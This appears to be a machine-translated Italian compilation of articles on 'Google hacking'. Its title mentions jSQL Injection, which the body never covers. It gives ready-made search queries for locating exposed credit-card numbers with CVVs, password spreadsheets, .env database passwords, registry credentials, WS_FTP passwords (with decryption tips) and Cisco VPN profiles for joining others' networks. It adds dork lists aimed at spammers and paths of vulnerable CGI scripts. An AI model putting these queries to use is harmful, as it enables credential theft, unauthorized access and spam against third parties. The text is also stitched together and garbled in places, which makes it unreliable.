Istruzioni per l'utilizzo di jSQL Injection, uno strumento multifunzionale per trovare e sfruttare le SQL injection in Kali Linux. Utilizzo delle funzionalità poco conosciute di Google per trovare cose nascoste Utilizzando Google come scanner CGI

Ottenere dati privati ​​non significa sempre hacking: a volte vengono pubblicati accesso pubblico. Conoscenza Impostazioni di Google e un po' di ingegno ti permetterà di trovare molte cose interessanti, dai numeri di carta di credito ai documenti dell'FBI.

ATTENZIONE Tutte le informazioni sono fornite solo a scopo informativo. Né gli editori né l'autore sono responsabili per eventuali danni causati dai materiali di questo articolo.

Oggi tutto è connesso a Internet, senza preoccuparsi di limitarne l’accesso. Pertanto, molti dati privati ​​diventano preda dei motori di ricerca. I robot ragno non si limitano più alle pagine web, ma indicizzano tutti i contenuti disponibili su Internet e aggiungono costantemente informazioni non pubbliche ai loro database. Scoprire questi segreti è facile: devi solo sapere come chiederli.

Alla ricerca di file

In mani capaci, Google troverà rapidamente tutto ciò che non si trova su Internet, ad esempio informazioni personali e file per uso ufficiale. Spesso sono nascosti come una chiave sotto il tappeto: non ci sono vere e proprie restrizioni di accesso, i dati giacciono semplicemente sul retro del sito, dove non portano collegamenti. L'interfaccia web standard di Google fornisce solo impostazioni di base ricerca avanzata, ma anche queste saranno sufficienti.

Puoi limitare la tua ricerca su Google a un tipo specifico di file utilizzando due operatori: filetype ed ext . Il primo specifica il formato che il motore di ricerca ha determinato dal titolo del file, il secondo specifica l'estensione del file, indipendentemente dal suo contenuto interno. Durante la ricerca in entrambi i casi, è sufficiente specificare l'estensione. Inizialmente l'operatore ext era comodo da utilizzare nei casi in cui il file non aveva caratteristiche di formato specifiche (ad esempio per cercare file di configurazione ini e cfg, che potevano contenere qualsiasi cosa). Ora Algoritmi di Google sono cambiati e non c'è alcuna differenza visibile tra gli operatori: i risultati nella maggior parte dei casi sono gli stessi.


Filtraggio dei risultati

Per impostazione predefinita, Google cerca le parole e, in generale, tutti i caratteri inseriti in tutti i file delle pagine indicizzate. Puoi limitare l'area di ricerca in base al dominio di primo livello, a un sito specifico o alla posizione della sequenza di ricerca nei file stessi. Per le prime due opzioni utilizzare l'operatore sito seguito dal nome del dominio o del sito selezionato. Nel terzo caso, tutta una serie di operatori consente di cercare informazioni nei campi del servizio e nei metadati. Ad esempio allinurl troverà quello indicato nel corpo dei link stessi, allinanchor - nel testo dotato del tag , allintitle - nei titoli delle pagine, allintext - nel corpo delle pagine.

Per ogni operatore esiste una versione leggera con un nome più breve (senza il prefisso all). La differenza è che allinurl troverà i collegamenti con tutte le parole e inurl troverà solo i collegamenti con la prima di esse. La seconda e le successive parole della query possono apparire ovunque nelle pagine web. L'operatore inurl differisce anche da un altro operatore con un significato simile: sito. Il primo consente anche di trovare qualsiasi sequenza di caratteri in un collegamento al documento cercato (ad esempio, /cgi-bin/), ampiamente utilizzato per trovare componenti con vulnerabilità note.

Proviamolo in pratica. Prendiamo il filtro allintext e facciamo sì che la richiesta produca un elenco di numeri e codici di verifica delle carte di credito che scadranno solo tra due anni (o quando i loro proprietari si stancheranno di dare da mangiare a tutti).

Allintext: data di scadenza del numero della carta /2017 cvv

Quando leggi nelle notizie che un giovane hacker "è entrato nei server" del Pentagono o della NASA, rubando informazioni riservate, nella maggior parte dei casi stiamo parlando proprio di una tecnica così basilare di utilizzo di Google. Supponiamo di essere interessati a un elenco di dipendenti della NASA e alle loro informazioni di contatto. Sicuramente tale elenco è disponibile in formato elettronico. Per comodità o per motivi di supervisione, potrebbe anche trovarsi sul sito Web dell'organizzazione stessa. È logico che in questo caso non ci saranno collegamenti ad esso, poiché è destinato ad uso interno. Quali parole possono esserci in un file del genere? Come minimo: il campo "indirizzo". Testare tutte queste ipotesi è facile.


Inurl:nasa.gov tipo file:xlsx "indirizzo"


Usiamo la burocrazia

Ritrovamenti come questo sono un bel tocco. Una cattura davvero solida è data da una conoscenza più dettagliata degli operatori di Google per i webmaster, della Rete stessa e delle peculiarità della struttura di ciò che si cerca. Conoscendo i dettagli, puoi facilmente filtrare i risultati e perfezionare le proprietà dei file necessari per ottenere dati veramente preziosi nel resto. È divertente che qui la burocrazia venga in soccorso. Produce formulazioni standard utili per la ricerca di informazioni segrete trapelate accidentalmente su Internet.

Ad esempio, il timbro di dichiarazione di distribuzione, richiesto dal Dipartimento della Difesa degli Stati Uniti, indica restrizioni standardizzate sulla distribuzione di un documento. La lettera A indica comunicati pubblici in cui non c'è nulla di segreto; B - destinato solo ad uso interno, C - strettamente confidenziale, e così via fino alla F. Spicca separatamente la lettera X, che contrassegna informazioni particolarmente preziose che rappresentano un segreto di stato di altissimo livello. Lasciamo che coloro che dovrebbero farlo in servizio cerchino tali documenti e ci limiteremo ai file con la lettera C. Secondo la direttiva DoDI 5230.24, questo contrassegno è assegnato ai documenti contenenti una descrizione delle tecnologie critiche che rientrano nel controllo delle esportazioni . Puoi trovare informazioni così attentamente protette sui siti nel dominio di primo livello.mil, assegnato all'esercito americano.

"DICHIARAZIONE DI DISTRIBUZIONE C" inurl:navy.mil

È molto conveniente che il dominio .mil contenga solo siti del Dipartimento della Difesa degli Stati Uniti e delle sue organizzazioni contrattuali. I risultati di ricerca con una limitazione di dominio sono eccezionalmente puliti e i titoli parlano da soli. Cercare i segreti russi in questo modo è praticamente inutile: nei domini.ru e.rf regna il caos, e i nomi di molti sistemi d'arma suonano come quelli botanici (PP "Kiparis", cannoni semoventi "Akatsia") o addirittura favolosi ( TOS “Buratino”).


Studiando attentamente un qualsiasi documento proveniente da un sito del dominio .mil, puoi visualizzare altri indicatori per affinare la ricerca. Ad esempio un riferimento alle restrizioni all'esportazione “Sec 2751”, utile anche per la ricerca di informazioni tecniche interessanti. Di tanto in tanto viene rimosso dai siti ufficiali in cui appariva una volta, quindi se non riesci a seguire un collegamento interessante nei risultati di ricerca, utilizza la cache di Google (operatore cache) o il sito Internet Archive.

Salendo tra le nuvole

Oltre ai documenti governativi declassificati accidentalmente, nella cache di Google compaiono occasionalmente collegamenti a file personali di Dropbox e altri servizi di archiviazione dati che creano collegamenti "privati" a dati pubblicati pubblicamente. È ancora peggio con i servizi alternativi e fatti in casa. Ad esempio, la query seguente trova dati per tutti i clienti Verizon che hanno un server FTP installato e utilizzano attivamente il proprio router.

Allinurl:ftp://verizon.net

Ora ci sono più di quarantamila persone così intelligenti e nella primavera del 2015 ce n'erano molte di più. Invece di Verizon.net, puoi sostituire il nome di qualsiasi fornitore noto, e più è famoso, maggiore può essere la cattura. Attraverso il server FTP integrato, puoi visualizzare i file su un dispositivo di archiviazione esterno collegato al router. Di solito si tratta di un NAS per il lavoro remoto, un cloud personale o una sorta di download di file peer-to-peer. Tutti i contenuti di tali media sono indicizzati da Google e altri motori di ricerca, quindi puoi accedere ai file archiviati su unità esterne tramite un collegamento diretto.

Guardando le configurazioni

Prima della migrazione su larga scala nel cloud, come spazio di archiviazione remoto regnavano semplici server FTP, che presentavano anche molte vulnerabilità. Molti di loro sono ancora attuali oggi. Ad esempio, il popolare programma WS_FTP Professional memorizza i dati di configurazione, gli account utente e le password nel file ws_ftp.ini. È facile da trovare e leggere, poiché tutti i record vengono salvati in formato testo e le password vengono crittografate con l'algoritmo Triple DES dopo un minimo offuscamento. Nella maggior parte delle versioni è sufficiente scartare semplicemente il primo byte.

È facile decrittografare tali password utilizzando l'utilità WS_FTP Password Decryptor o un servizio Web gratuito.

Quando si parla di hacking di un sito web arbitrario, di solito si intende ottenere una password dai log e dai backup dei file di configurazione di CMS o applicazioni di e-commerce. Se conosci la loro struttura tipica, puoi facilmente indicarla parole chiave. Righe come quelle trovate in ws_ftp.ini sono estremamente comuni. Ad esempio, in Drupal e PrestaShop c'è sempre un identificatore utente (UID) e una password corrispondente (pwd) e tutte le informazioni sono archiviate in file con estensione .inc. Puoi cercarli come segue:

"pwd=" "UID=" ext:inc

Rivelazione delle password DBMS

Nei file di configurazione dei server SQL, nomi e indirizzi E-mail gli utenti vengono archiviati in testo non crittografato e, invece delle password, vengono registrati i loro hash MD5. A rigor di termini, è impossibile decrittografarli, ma è possibile trovare una corrispondenza tra le coppie hash-password conosciute.

Esistono ancora DBMS che non utilizzano nemmeno l'hashing delle password. I file di configurazione di ciascuno di essi possono essere semplicemente visualizzati nel browser.

Testo: DB_PASSWORD tipo file: env

Con l'avvento dei server Windows, il registro ha parzialmente preso il posto dei file di configurazione. Puoi cercare tra i suoi rami esattamente nello stesso modo, usando reg come tipo di file. Ad esempio, in questo modo:

Tipo file:reg HKEY_CURRENT_USER "Password"=

Non dimentichiamo l'ovvio

A volte è possibile accedere a informazioni riservate utilizzando dati che sono stati aperti accidentalmente e che sono venuti a conoscenza di Google. L'opzione ideale è trovare un elenco di password in un formato comune. Memorizza le informazioni sull'account in file di testo, Documento di parole o elettronico Foglio di calcolo Excel Solo i disperati possono farlo, ma ce ne sono sempre abbastanza.

Tipo file:xls inurl:password

Da un lato, ci sono molti mezzi per prevenire tali incidenti. È necessario specificare diritti di accesso adeguati in htaccess, applicare patch al CMS, non utilizzare script per mancini e chiudere altri buchi. Esiste anche un file con un elenco di eccezioni robots.txt che impedisce ai motori di ricerca di indicizzare i file e le directory in esso specificati. D'altra parte, se la struttura del file robots.txt su qualche server differisce da quella standard, diventa immediatamente chiaro cosa si sta cercando di nascondere su di esso.

L'elenco delle directory e dei file su qualsiasi sito è preceduto dall'indice standard di. Poiché per scopi di servizio deve apparire nel titolo, è logico limitare la ricerca all'operatore intitle. Cose interessanti si trovano nelle directory /admin/, /personal/, /etc/ e persino /secret/.

Resta sintonizzato per gli aggiornamenti

La rilevanza qui è estremamente importante: le vecchie vulnerabilità vengono chiuse molto lentamente, ma Google e i suoi risultati di ricerca cambiano costantemente. C'è anche una differenza tra un filtro "ultimo secondo" (&tbs=qdr:s alla fine dell'URL della richiesta) e un filtro "in tempo reale" (&tbs=qdr:1).

Intervallo data/ora ultimo aggiornamento Google indica anche il file in modo implicito. Tramite l'interfaccia web grafica è possibile selezionare uno dei periodi standard (ora, giorno, settimana, ecc.) o impostare un intervallo di date, ma questo metodo non è adatto all'automazione.

Dall'aspetto della barra degli indirizzi, puoi solo immaginare un modo per limitare l'output dei risultati utilizzando la costruzione &tbs=qdr:. La lettera y dopo imposta il limite di un anno (&tbs=qdr:y), m mostra i risultati dell'ultimo mese, w - per la settimana, d - per il giorno passato, h - per l'ultima ora, n - per il minuto, e s - per dammi un secondo. I risultati più recenti che Google ha appena reso noti si trovano utilizzando il filtro &tbs=qdr:1 .

Se hai bisogno di scrivere uno script intelligente, ti sarà utile sapere che l'intervallo di date è impostato in Google in formato giuliano utilizzando l'operatore daterange. Ad esempio, ecco come puoi trovare l'elenco dei documenti PDF con la parola riservata, scaricati dal 1 gennaio al 1 luglio 2015.

Tipo di file confidenziale: intervallo di date PDF: 2457024-2457205

L'intervallo è indicato nel formato della data giuliana senza tenere conto della parte frazionaria. Tradurli manualmente dal calendario gregoriano è scomodo. È più semplice utilizzare un convertitore di date.

Targeting e filtraggio di nuovo

Oltre a specificare operatori aggiuntivi nella query di ricerca, questi possono essere inviati direttamente nel corpo del collegamento. Ad esempio, la specifica filetype:pdf corrisponde alla costruzione as_filetype=pdf . Ciò rende conveniente chiedere eventuali chiarimenti. Diciamo che l'output dei risultati viene specificato solo dalla Repubblica dell'Honduras aggiungendo la costruzione cr=countryHN all'URL di ricerca e solo dalla città di Bobruisk - gcs=Bobruisk. Puoi trovare un elenco completo nella sezione sviluppatori.

Gli strumenti di automazione di Google sono progettati per semplificare la vita, ma spesso aggiungono problemi. Ad esempio, la città dell’utente è determinata dall’IP dell’utente tramite WHOIS. Sulla base di queste informazioni, Google non solo bilancia il carico tra i server, ma modifica anche i risultati della ricerca. A seconda della regione, per la stessa richiesta, nella prima pagina appariranno risultati diversi e alcuni di essi potrebbero essere completamente nascosti. Il codice di due lettere dopo la direttiva gl=country ti aiuterà a sentirti cosmopolita e a cercare informazioni da qualsiasi paese. Ad esempio, il codice dei Paesi Bassi è NL, ma il Vaticano e la Corea del Nord non hanno un proprio codice in Google.

Spesso i risultati della ricerca risultano confusi anche dopo aver utilizzato diversi filtri avanzati. In questo caso, è facile chiarire la richiesta aggiungendovi diverse parole di eccezione (davanti a ciascuna di esse viene posto un segno meno). Ad esempio, servizi bancari, nomi e tutorial vengono spesso utilizzati con la parola Personale. Pertanto, risultati di ricerca più puliti verranno mostrati non da un esempio da manuale di query, ma da uno perfezionato:

Titolo:"Indice di /Personale/" -nomi -tutorial -bancario

Un ultimo esempio

Un hacker sofisticato si distingue per il fatto che si procura da solo tutto ciò di cui ha bisogno. Ad esempio, la VPN è una cosa conveniente, ma costosa, oppure temporanea e con restrizioni. Sottoscrivere un abbonamento per te stesso è troppo costoso. È positivo che ci siano abbonamenti di gruppo, ma con utilizzando GoogleÈ facile entrare a far parte di un gruppo. Per fare ciò, basta trovare il file di configurazione di Cisco VPN, che ha un'estensione PCF piuttosto non standard e un percorso riconoscibile: Programmi\Cisco Systems\VPN Client\Profiles. Una richiesta e ti unisci, ad esempio, al simpatico team dell'Università di Bonn.

Tipo di file: pcf vpn OR Gruppo

INFO Google trova file di configurazione con password, ma molti di essi sono scritti in forma crittografata o sostituiti con hash. Se vedi stringhe di lunghezza fissa, cerca immediatamente un servizio di decrittazione.

Le password vengono archiviate crittografate, ma Maurice Massard ha già scritto un programma per decrittografarle e lo fornisce gratuitamente tramite thecampusgeeks.com.

Google esegue centinaia di diversi tipi di attacchi e test di penetrazione. Esistono molte opzioni che riguardano programmi popolari, principali formati di database, numerose vulnerabilità di PHP, cloud e così via. Se sai esattamente cosa stai cercando, sarà molto più facile ottenerlo informazione necessaria(soprattutto uno che non era previsto che fosse reso pubblico). Shodan non è l'unico a nutrirsi idee interessanti, ma qualsiasi database di risorse di rete indicizzate!

Come effettuare una ricerca correttamente utilizzando google.com

Probabilmente tutti sanno come utilizzare un motore di ricerca come Google =) Ma non tutti lo sanno se lo componi correttamente query di ricerca con l'aiuto di disegni speciali puoi ottenere i risultati di ciò che stai cercando in modo molto più efficiente e veloce =) In questo articolo cercherò di mostrare cosa e come devi fare per cercare correttamente

Google supporta diversi operatori di ricerca avanzata che hanno un significato speciale durante la ricerca su google.com. In genere, queste affermazioni modificano la ricerca o addirittura dicono a Google di eseguire tipi di ricerca completamente diversi. Ad esempio, il collegamento: costrutto è un operatore speciale e la richiesta collegamento:www.google.com non eseguirà una ricerca normale, ma troverà invece tutte le pagine Web che contengono collegamenti a google.com.
tipi di richiesta alternativi

cache: se includi altre parole in una query, Google evidenzierà quelle parole incluse nel documento memorizzato nella cache.
Per esempio, cache:www.sito web mostrerà il contenuto memorizzato nella cache con la parola "web" evidenziata.

collegamento: la query di ricerca sopra mostrerà le pagine Web che contengono collegamenti alla query specificata.
Per esempio: collegamento:www.sito verranno visualizzate tutte le pagine che hanno un collegamento a http://www.site

correlati: visualizza le pagine Web "correlate" alla pagina Web specificata.
Per esempio, correlato: www.google.com elencherà le pagine web simili pagina iniziale Google.

info: Richiedi informazioni: presenterà alcune delle informazioni in possesso di Google sulla pagina web che stai richiedendo.
Per esempio, informazioni:sito web mostrerà informazioni sul nostro forum =) (Armada - Forum per webmaster per adulti).

Altre richieste di informazioni

define: La query define: fornirà una definizione delle parole inserite dopo di essa, raccolta da varie fonti online. La definizione riguarderà l'intera frase inserita (ovvero includerà tutte le parole nella query esatta).

azioni: se avvii una query con azioni: Google elaborerà il resto dei termini della query come simboli di azioni e si collegherà a una pagina che mostra informazioni già pronte per questi simboli.
Per esempio, azioni: Intel yahoo mostrerà informazioni su Intel e Yahoo. (Nota che dovresti digitare i simboli delle ultime notizie, non il nome dell'azienda)

Modificatori di query

site: Se includi site: nella tua query, Google limiterà i risultati ai siti web che trova in quel dominio.
Puoi anche cercare per singole zone, come ru, org, com, ecc. ( sito: com sito: ru)

allintitle: se esegui una query con allintitle:, Google limiterà i risultati a tutte le parole della query nel titolo.
Per esempio, allintitle: ricerca google restituirà tutte le pagine di Google tramite ricerca come immagini, blog, ecc

intitle: se includi intitle: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nel titolo.
Per esempio, titolo: Affari

allinurl: se esegui una query con allinurl: Google limiterà i risultati a tutte le parole della query nell'URL.
Per esempio, allinurl: ricerca su google restituirà i documenti con Google e cercherà nel titolo. Inoltre, come opzione, puoi separare le parole con una barra (/), quindi le parole su entrambi i lati della barra verranno cercate all'interno della stessa pagina: Esempio allinurl: foo/bar

inurl: se includi inurl: nella tua query, Google limiterà i risultati ai documenti contenenti quella parola nell'URL.
Per esempio, Animazione inurl:sito

intext: cerca solo la parola specificata nel testo della pagina, ignorando il titolo, i testi dei collegamenti e altre cose non correlate. Esiste anche un derivato di questo modificatore - allintext: i.e. inoltre, tutte le parole nella query verranno cercate solo nel testo, che può anche essere importante, ignorando le parole usate di frequente nei collegamenti
Per esempio, testo:forum

intervallo date: ricerche all'interno di un intervallo di tempo (intervallo date: 2452389-2452389), le date degli orari sono in formato giuliano.

Bene, e tutti i tipi di esempi interessanti di query

Esempi di scrittura di query per Google. Per gli spammer

Inurl:control.guest?a=segno

Sito:books.dreambook.com “URL della home page” “Firma il mio” inurl:firma

Sito: www.freegb.net Home page

Inurl:sign.asp “Conteggio caratteri”

“Messaggio:” inurl:sign.cfm “Mittente:”

Inurl:register.php “Registrazione Utente” “Sito Web”

Inurl:edu/guestbook “Firma il libro degli ospiti”

Inurl: pubblica “Pubblica commento” “URL”

Inurl:/archives/ “Commenti:” “Ricordi informazioni?”

"Script e libro degli ospiti creati da:" "URL:" "Commenti:"

Inurl:?action=aggiungi “phpBook” “URL”

Titolo: "Invia nuova storia"

Riviste

Inurl:www.livejournal.com/users/mode=reply

Inurl Greatestjournal.com/mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Libro degli ospiti"

Blog

Inurl:blogger.com/comment.g?”postID””anonimo”

Inurl:typepad.com/ “Pubblica un commento” “Ricordi le informazioni personali?”

Inurl:greatestjournal.com/community/ “Pubblica commento” “indirizzi di autori anonimi”

“Pubblica commento” “indirizzi di autori anonimi” -

Titolo:"Pubblica commento"

Inurl:pirillo.com “Pubblica commento”

Forum

Inurl:gate.html?”nome=Forum” “modalità=rispondi”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”membri.html”

Inurl:forum/elencomembri.php?"

Hacking con Google

Aleksandr Antipov

Sistema di ricerca Google (www.google.com) fornisce molte opzioni di ricerca. Tutte queste funzionalità rappresentano uno strumento di ricerca inestimabile per un utente nuovo su Internet e allo stesso tempo un'arma di invasione e distruzione ancora più potente nelle mani di persone con intenzioni malvagie, inclusi non solo hacker, ma anche criminali non informatici e anche terroristi.
(9475 visualizzazioni in 1 settimana)


Denis Barankov
denisNOSPAMixi.ru

Attenzione: Questo articolo non è una guida all'azione. Questo articolo è stato scritto per voi, amministratori di server WEB, affinché possiate perdere la falsa sensazione di essere al sicuro e comprenderete finalmente l'insidiosità di questo metodo per ottenere informazioni e assumervi il compito di proteggere il vostro sito.

introduzione

Ad esempio, ho trovato 1670 pagine in 0,14 secondi!

2. Immettere un'altra riga, ad esempio:

inurl:"auth_user_file.txt"

un po 'meno, ma questo è già sufficiente per il download gratuito e per indovinare la password (utilizzando lo stesso John The Ripper). Di seguito fornirò una serie di altri esempi.

Quindi, devi capire che il motore di ricerca di Google ha visitato la maggior parte dei siti Internet e ha memorizzato nella cache le informazioni in essi contenute. Queste informazioni memorizzate nella cache consentono di ottenere informazioni sul sito e sul contenuto del sito senza collegarsi direttamente al sito, ma solo approfondendo le informazioni archiviate all'interno di Google. Inoltre, se le informazioni sul sito non sono più disponibili, le informazioni nella cache potrebbero essere comunque conservate. Tutto ciò di cui hai bisogno per questo metodo è conoscere alcune parole chiave di Google. Questa tecnica si chiama Google Hacking.

Le informazioni su Google Hacking sono apparse per la prima volta sulla mailing list Bugtruck 3 anni fa. Nel 2001, questo argomento è stato sollevato da uno studente francese. Ecco un collegamento a questa lettera http://www.cotse.com/mailing-lists/bugtraq/2001/Nov/0129.html. Fornisce i primi esempi di tali query:

1) Indice di /admin
2) Indice di /password
3) Indice di /mail
4) Indice di / +banques +filetype:xls (per la Francia...)
5) Indice di /+passwd
6) Indice di /password.txt

Questo argomento ha fatto scalpore nella parte di Internet che legge inglese abbastanza recentemente: dopo l'articolo di Johnny Long, pubblicato il 7 maggio 2004. Per uno studio più completo su Google Hacking, ti consiglio di visitare il sito di questo autore http://johnny.ihackstuff.com. In questo articolo voglio solo aggiornarvi.

Chi può usarlo:
- Giornalisti, spie e tutte quelle persone a cui piace ficcare il naso negli affari altrui possono usarlo per cercare prove incriminanti.
- Hacker alla ricerca di obiettivi adatti per l'hacking.

Come funziona Google.

Per continuare la conversazione, lascia che ti ricordi alcune delle parole chiave utilizzate nelle query di Google.

Cerca utilizzando il segno +

Google esclude dalle ricerche le parole che ritiene non importanti. Ad esempio, parole interrogative, preposizioni e articoli in lingua inglese: ad esempio sono, di, dove. In russo, Google sembra considerare importanti tutte le parole. Se una parola viene esclusa dalla ricerca, Google lo scrive. Affinché Google possa iniziare a cercare pagine con queste parole, devi aggiungere un segno + senza spazio prima della parola. Per esempio:

asso +di base

Cerca utilizzando il segno –

Se Google trova un gran numero di pagine da cui desideri escludere pagine con un determinato argomento, puoi forzare Google a cercare solo le pagine che non contengono determinate parole. Per fare ciò, devi indicare queste parole posizionando un segno davanti a ciascuna, senza uno spazio prima della parola. Per esempio:

pesca - vodka

Cerca utilizzando ~

Potresti voler cercare non solo la parola specificata, ma anche i suoi sinonimi. Per fare ciò, precedere la parola con il simbolo ~.

Trovare una frase esatta utilizzando le virgolette doppie

Google cerca su ogni pagina tutte le occorrenze delle parole che hai scritto nella stringa di query e non si preoccupa della posizione relativa delle parole, purché tutte le parole specificate siano sulla pagina contemporaneamente (questo è l'azione predefinita). Trovare frase esatta– va messo tra virgolette. Per esempio:

"fermalibri"

Affinché venga visualizzata almeno una delle parole specificate, è necessario specificare operazione logica esplicito: O. Per esempio:

prenotare la sicurezza o la protezione

Inoltre, puoi utilizzare il segno * nella barra di ricerca per indicare qualsiasi parola e. per rappresentare qualsiasi personaggio.

Ricerca di parole utilizzando operatori aggiuntivi

Esistono operatori di ricerca specificati nella stringa di ricerca nel formato:

operatore:termine_ricerca

Gli spazi accanto ai due punti non sono necessari. Se inserisci uno spazio dopo i due punti, vedrai un messaggio di errore e prima di esso Google li utilizzerà come una normale stringa di ricerca.
Esistono gruppi di operatori di ricerca aggiuntivi: lingue - indica in quale lingua vuoi vedere il risultato, data - limita i risultati negli ultimi tre, sei o 12 mesi, occorrenze - indica dove devi cercare nel documento la riga: ovunque, nel titolo, nell'URL, nei domini: cerca nel sito specificato o, al contrario, escludilo dalla ricerca, Ricerca sicura- bloccare i siti contenenti il ​​tipo di informazioni specificato e rimuoverli dalle pagine dei risultati di ricerca.
Allo stesso tempo, alcuni operatori non richiedono parametri aggiuntivi, ad esempio la richiesta "cache:www.google.com" può essere chiamata come una stringa di ricerca a tutti gli effetti e alcune parole chiave, al contrario, richiedono una ricerca parola, ad esempio "site:www.google.com guida". Alla luce del nostro argomento, diamo un'occhiata i seguenti operatori:

Operatore

Descrizione

Richiede un parametro aggiuntivo?

cercare solo nel sito specificato in search_term

cerca solo nei documenti con tipo search_term

trova le pagine contenenti search_term nel titolo

trova le pagine contenenti tutte le parole search_term nel titolo

trova le pagine contenenti la parola search_term nel loro indirizzo

trova le pagine contenenti tutte le parole search_term nel loro indirizzo

L'operatore site: limita la ricerca solo al sito specificato ed è possibile specificarne altri oltre Nome del dominio, ma anche un indirizzo IP. Ad esempio, inserisci:

operatore tipo file: limita la ricerca a un tipo di file specifico. Per esempio:

Alla data di pubblicazione dell'articolo, Google può effettuare ricerche in 13 diversi formati di file:

  • Formato documento portatile Adobe (pdf)
  • Adobe PostScript (ps)
  • Lotus 1-2-3 (settimana1, settimana2, settimana3, settimana4, settimana5, settimana, settimana, settimana)
  • Loto WordPro (lwp)
  • MacWrite (mw)
  • Microsoft Excel(XL)
  • Microsoft PowerPoint (ppt)
  • Microsoft Word(doc)
  • Microsoft Works (wks, wps, wdb)
  • Microsoft Write (scrittura)
  • Formato Rich Text (rtf)
  • Flash ad onda d'urto (swf)
  • Testo (ans, txt)

Operatore di collegamento: mostra tutte le pagine che puntano alla pagina specificata.
Probabilmente è sempre interessante vedere quanti posti su Internet sanno di te. Proviamo:

Operatore cache: mostra la versione del sito memorizzata nella cache di Google come appariva quando Google più recente ha visitato questa pagina una volta. Prendiamo qualsiasi sito che cambia frequentemente e guardiamo:

operatore intitle: cerca una parola specificata nel titolo di una pagina. L'operatore allintitle: è un'estensione: cerca tutte le parole multiple specificate nel titolo della pagina. Confrontare:

titolo: volo su Marte
intitle:volo intitle:on intitle:marte
allintitle: volo su Marte

L'operatore inurl: fa sì che Google mostri tutte le pagine contenenti la stringa specificata nell'URL. operatore allinurl: cerca tutte le parole in un URL. Per esempio:

allinurl:acido acid_stat_alerts.php

Questo comando è particolarmente utile per coloro che non hanno SNORT: almeno possono vedere come funziona su un sistema reale.

Metodi di hacking utilizzando Google

Quindi, abbiamo scoperto che utilizzando una combinazione degli operatori e delle parole chiave di cui sopra, chiunque può raccogliere le informazioni necessarie e cercare le vulnerabilità. Queste tecniche sono spesso chiamate Google Hacking.

Mappa del sito

Puoi utilizzare l'operatore site: per elencare tutti i link che Google ha trovato su un sito. In genere, le pagine create dinamicamente dagli script non vengono indicizzate utilizzando parametri, quindi alcuni siti utilizzano filtri ISAPI in modo che i collegamenti non siano nel formato /article.asp?num=10&dst=5 , ma con barre /article/abc/num/ 10/ dst/5. Questo viene fatto affinché il sito venga generalmente indicizzato dai motori di ricerca.

Proviamo:

sito:www.whitehouse.govcasabianca

Google pensa che ogni pagina di un sito web contenga la parola whitehouse. Questo è ciò che usiamo per ottenere tutte le pagine.
Esiste anche una versione semplificata:

sito:whitehouse.gov

E la parte migliore è che i compagni di whitehouse.gov non sapevano nemmeno che avevamo esaminato la struttura del loro sito e persino le pagine memorizzate nella cache scaricate da Google. Questo può essere utilizzato per studiare la struttura dei siti e visualizzare i contenuti, rimanendo per il momento inosservati.

Visualizza un elenco di file nelle directory

I server WEB possono mostrare elenchi di directory di server invece dei soliti Pagine HTML. Questo di solito viene fatto per incoraggiare gli utenti a selezionare e scaricare determinati file. Tuttavia, in molti casi, gli amministratori non hanno intenzione di mostrare il contenuto di una directory. Ciò è dovuto a configurazione errata server o mancanza pagina iniziale nella directory. Di conseguenza, l'hacker ha la possibilità di trovare qualcosa di interessante nella directory e utilizzarlo per i propri scopi. Per trovare tutte queste pagine è sufficiente notare che tutte contengono le parole: indice di. Ma poiché l'indice delle parole contiene non solo tali pagine, dobbiamo perfezionare la query e prendere in considerazione le parole chiave della pagina stessa, quindi query come:

intitle:index.della directory principale
intitle:index.della dimensione del nome

Poiché la maggior parte degli elenchi di directory sono intenzionali, potresti avere difficoltà a trovare elenchi fuori posto la prima volta. Ma almeno puoi già utilizzare gli elenchi per determinare la versione del server WEB, come descritto di seguito.

Ottenere la versione del server WEB.

Conoscere la versione del server WEB è sempre utile prima di sferrare qualsiasi attacco hacker. Ancora una volta, grazie a Google, puoi ottenere queste informazioni senza collegarti a un server. Se osservate attentamente l'elenco delle directory, vedrete che lì vengono visualizzati il ​​nome del server WEB e la sua versione.

Apache1.3.29 - Server ProXad su trf296.free.fr Porta 80

Un amministratore esperto può modificare queste informazioni, ma, di regola, è vero. Pertanto, per ottenere queste informazioni è sufficiente inviare una richiesta:

intitle:index.of server.at

Per ottenere informazioni per un server specifico, chiariamo la richiesta:

intitle:index.of server.at site:ibm.com

O viceversa, stiamo cercando server che eseguono una versione specifica del server:

titolo:index.del server Apache/2.0.40 su

Questa tecnica può essere utilizzata da un hacker per trovare una vittima. Se, ad esempio, ha un exploit per una determinata versione del server WEB, può trovarlo e provare l'exploit esistente.

È inoltre possibile ottenere la versione del server visualizzando le pagine installate per impostazione predefinita durante l'installazione dell'ultima versione del server WEB. Ad esempio, per vedere la pagina di test di Apache 1.2.6, basta digitare

intitle:Test.Page.for.Apache ha.funzionato!

Inoltre, alcuni sistemi operativi installano e avviano immediatamente il server WEB durante l'installazione. Tuttavia, alcuni utenti non ne sono nemmeno consapevoli. Naturalmente, se vedi che qualcuno non ha rimosso la pagina predefinita, è logico supporre che il computer non abbia subito alcuna personalizzazione e sia probabilmente vulnerabile agli attacchi.

Prova a cercare le pagine IIS 5.0

allintitle:Benvenuti in Servizi Internet di Windows 2000

Nel caso di IIS, puoi determinare non solo la versione del server, ma anche Versione di Windows e pacchetto di servizi.

Un altro modo per determinare la versione del server WEB è cercare manuali (pagine di aiuto) ed esempi che potrebbero essere installati sul sito per impostazione predefinita. Gli hacker hanno trovato diversi modi per utilizzare questi componenti per ottenere un accesso privilegiato a un sito. Ecco perché è necessario rimuovere questi componenti nel sito di produzione. Per non parlare del fatto che la presenza di questi componenti può essere sfruttata per ottenere informazioni sul tipo di server e sulla sua versione. Ad esempio, troviamo il manuale di Apache:

inurl: moduli manuali delle direttive apache

Utilizzando Google come uno scanner CGI.

Lo scanner CGI o scanner WEB è un'utilità per la ricerca di script e programmi vulnerabili sul server della vittima. Queste utilità devono sapere cosa cercare, per questo hanno un intero elenco di file vulnerabili, ad esempio:

/cgi-bin/cgiemail/uargg.txt
/random_banner/index.cgi
/random_banner/index.cgi
/cgi-bin/mailview.cgi
/cgi-bin/maillist.cgi
/cgi-bin/userreg.cgi

/iissamples/ISSamples/SQLQHit.asp
/SiteServer/admin/findvserver.asp
/scripts/cphost.dll
/cgi-bin/finger.cgi

